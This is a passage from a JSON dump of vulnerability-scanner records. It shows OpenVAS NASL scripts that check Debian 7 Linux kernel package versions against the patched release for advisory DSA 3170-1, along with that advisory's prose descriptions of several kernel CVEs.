ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", 
ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", 
rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:53:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. 
A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. 
This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.", "modified": "2017-07-07T00:00:00", "published": "2015-02-23T00:00:00", "id": "OPENVAS:703170", "href": "http://plugins.openvas.org/nasl.php?oid=703170", "type": "openvas", "title": "Debian Security Advisory DSA 3170-1 (linux - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3170.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3170-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703170);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2013-7421\", \"CVE-2014-7822\", \"CVE-2014-8160\", \"CVE-2014-8559\",\n \"CVE-2014-9585\", \"CVE-2014-9644\", \"CVE-2014-9683\", \"CVE-2015-0239\",\n \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_name(\"Debian Security Advisory DSA 3170-1 (linux - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-02-23 00:00:00 +0100 (Mon, 23 Feb 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3170.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"linux on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Linux kernel is the core of the Linux\noperating system.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 3.2.65-1+deb7u2. 
Additionally this update\nfixes regressions introduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be fixed\nsoon (a subset is fixed already).\n\nFor the unstable distribution (sid), these problems will be fixed soon\n(a subset is fixed already).\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. 
A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. 
This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", 
ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", 
ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", 
